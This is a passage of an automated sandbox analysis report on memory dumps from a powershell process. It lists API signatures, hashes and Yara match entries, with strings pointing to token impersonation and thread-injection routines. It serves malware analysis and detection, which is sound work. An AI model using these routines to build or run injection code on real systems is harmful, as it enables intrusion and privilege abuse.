                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                    • String ID:
                                                    • API String ID: 996410232-0
                                                    • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                                    • Instruction ID: a73402fa2dae793b3ed3589d4b759c136341b68734bb66b3c00fff1965466238
                                                    • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                                    • Instruction Fuzzy Hash: D041082220478566FE15DBA67B1865A6B98B79CBC8F0B4020DD068FF66EE3CD406D710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                                    • String ID: %s&%s$?%s
                                                    • API String ID: 1095232423-1750478248
                                                    • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                                    • Instruction ID: 5088b933b5a4fe4c604a4814eab3de4091068bfc2908877f1d7c835cf542c88d
                                                    • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                                    • Instruction Fuzzy Hash: 4F41A462610E81A1EE11AF6AE2492E8A3A0FF9CB85F055511DF482BF71DF38D1A2D340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 2998201375-0
                                                    • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                                    • Instruction ID: cfe85d80bfa5cc3588154a56812bf9ac53861733f1f05f066463eaffd70f9d87
                                                    • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                                    • Instruction Fuzzy Hash: 4A41913222478096EF608F55A2847697BA1FB8CB94F194135EB8A5BFA5DF3CC841D700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                    • String ID:
                                                    • API String ID: 1696598829-0
                                                    • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                                    • Instruction ID: a97f0bc5df25d44a4decfae44be691092758bc4e9a706b370a7bd867fd7172e9
                                                    • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                                    • Instruction Fuzzy Hash: F111051130864060EE31EA93A2393AE6381E7A4FD0F454125AED90BFCADE2CC1019748
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno_errno
                                                    • String ID:
                                                    • API String ID: 2964073243-0
                                                    • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                                    • Instruction ID: 00e06eae99d833862ec1a4d067523ed5e6bddb9d6da4a13b80370d1023ccfb81
                                                    • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                                    • Instruction Fuzzy Hash: DD01F465721A49A4FF34ABE4CABD7AC22509BB0B32F938301C6A903BD2C73C44016718
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno_errno
                                                    • String ID:
                                                    • API String ID: 2964073243-0
                                                    • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                                    • Instruction ID: fa5e35910466e9a5453cd651084764f139d783254c7d8ece31e56489f4ec14ad
                                                    • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                                    • Instruction Fuzzy Hash: E101FF63721604A5FE196FE4EA8836C32519F98B32FA74310D5290FFF2CF3C4082A610
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s!%s
                                                    • API String ID: 0-2935588013
                                                    • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                                    • Instruction ID: e8996152d96a2dd37ec98bc35eaaae0f0c15b0e0e61dddb37716f46393388628
                                                    • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                                    • Instruction Fuzzy Hash: 72517765204640A6EF28DF91E254759B361F34CBD4F464022EF4A8BFA5EB3CC942E704
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintfmallocstrrchr
                                                    • String ID: Failed to impersonate token: %d$t permissions in process: %d
                                                    • API String ID: 3587327836-1492073275
                                                    • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                                                    • Instruction ID: c25c43ab841eda312eabcd22a95f1c272d8b0f98aac9ec142398968c6c2a5050
                                                    • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                                                    • Instruction Fuzzy Hash: EF41C62070424066EF35EFA6AA283AE6791F7A5BD4F454124EDC647F96CF7CC086E708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$CreateInfoPipeSleepStartup
                                                    • String ID: h
                                                    • API String ID: 1809008225-2439710439
                                                    • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                                    • Instruction ID: 9bc46e4276e08a8e36540263cdc059b30b9f856fa6443a2e420f502cfa405f1e
                                                    • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                                    • Instruction Fuzzy Hash: B2418932600B849AEB10CFA5E84468EB7B5F388798F114115EF9C57FA8DF78C546CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AccountInformationLookupToken_snprintf
                                                    • String ID: %s\%s
                                                    • API String ID: 2107350476-4073750446
                                                    • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                                    • Instruction ID: 064031cba514ca976e278ef9ebf93c96824b126d3602c6885bf9156367cc39cc
                                                    • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                                    • Instruction Fuzzy Hash: E3312F22204FC1A5EB24CF61E9446DA6364F78CB88F458125EA895BF69DF3CC209D740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: RtlCreateUserThread$ntdll.dll
                                                    • API String ID: 1646373207-2935400652
                                                    • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                                    • Instruction ID: 1cea38a5f73f893208cbb1de82f37cbd33b231544cc1bc8785ec3cc3d0c4130b
                                                    • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                                    • Instruction Fuzzy Hash: 7D116D32204B8592DB20CF51F988549B7A8F78CB80F998175EA8D47F24DF38C555DB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: NtQueueApcThread$ntdll
                                                    • API String ID: 1646373207-1374908105
                                                    • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                                    • Instruction ID: 6b3c125176ec9614f7dc39bd3531d868156838c5a36f10a06a044e8469f510c0
                                                    • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                                    • Instruction Fuzzy Hash: 5F01A225310B82A2EF00DBA6FA9825EA3A0F78DBD0F554521DE584BF74DF3CC451A700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: IsWow64Process$kernel32
                                                    • API String ID: 1646373207-3789238822
                                                    • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                                    • Instruction ID: 60dd46899dd8396d4d2484fb9e8683ca5b161111a12ad29b972592bf531dfa53
                                                    • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                                    • Instruction Fuzzy Hash: 66E09AA0321606A2EE04CBA5FAC832563A0EB8C780F491050998B0AF70EF2CC589FB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                    • API String ID: 1646373207-736604160
                                                    • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                                    • Instruction ID: 5efbd80b6bd060809d9632dfbba06535aee3a2f79f259c5aba095eb4fd4d3d99
                                                    • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                                    • Instruction Fuzzy Hash: 35D05E9075260BA1FE049BE1FACC2646350AB4DB40F4A10A5881E0EF70EE2CC19AF310
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                    • API String ID: 1646373207-3900151262
                                                    • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                                    • Instruction ID: a05087ec56a79c8515e049c014fbfd1f2214a34668b5387e56da578c0fe89db4
                                                    • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                                    • Instruction Fuzzy Hash: 05D05E5075260BA1FE08ABE2FACC6681390AB5DB40F4910A0891A0FF70EE7CC199F310
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                    • Instruction ID: ed651b794aa6ada30bb20561fad2f7ab0c4757cc1ff758d7d60d8e1279cf4603
                                                    • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                    • Instruction Fuzzy Hash: 5D61C732601600A6EF35CF99E7BD36833A1E779B54F26412DC9994BBA5CF34C441EB88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                    • Instruction ID: 455e3953f81d315fd51b7d6278bedf121fd673903d536ba3267b7137882d092f
                                                    • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                    • Instruction Fuzzy Hash: 30619C32641640B6EF54CB95FA4D7AA33E0E75CB59F264129DA055FFB1CB3CC842AB80
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                                    • String ID: not create token: %d
                                                    • API String ID: 1095232423-2272930512
                                                    • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                                    • Instruction ID: 650d9d309a08ee7777a19607750c823d736b95d9c80195e4b8ac57fa9bbac662
                                                    • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                                    • Instruction Fuzzy Hash: 4941D662604E84A1EE269FAED2593E863B0FFA8B84F055511DF8857F11DF34D1B2E344
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                                                    • String ID:
                                                    • API String ID: 2495333179-0
                                                    • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                                    • Instruction ID: 5838c0bf24727e3fec5a0d6529961534a45cdba83ad517dccfd59cf5830ce3fe
                                                    • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                                    • Instruction Fuzzy Hash: FA318D26600640A5EF64DFA2B68C26963A5FB4CF98F0A4514DE050FFA9DB3DC8C1E744
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timestrtok$FileSystem_getptd_time64malloc
                                                    • String ID:
                                                    • API String ID: 460628555-0
                                                    • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                                    • Instruction ID: 8e4a1da06794bf1de9a0996a5944b2785c77b94142dfb9208234b57dc05d4f66
                                                    • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                                    • Instruction Fuzzy Hash: EF2191B6600B94A2EF00CFD1F28865977A8F748B94F164255EE5A4BFA1DE38C4419740
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: clock
                                                    • String ID:
                                                    • API String ID: 3195780754-0
                                                    • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                    • Instruction ID: fd9c4c22eb0981f060e3e968f0bdb28e33bf87b6dd6ee0843eeabaec687d79c6
                                                    • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                    • Instruction Fuzzy Hash: 59113622200785B5FB71DEE666E462BB690BBA4794F1B0021EEC443A41EA30C8C59F08
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                    • String ID:
                                                    • API String ID: 4151157258-0
                                                    • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                                    • Instruction ID: b0c296d30841a032d0cd8526e155cd184a4332c4d8563f9ecd0b839f38861c0f
                                                    • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                                                    • Instruction Fuzzy Hash: 1B212B523181A872FF72D6919278B7D66D0F360BD5F1E5122E6D707EC5CA2CC541E704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
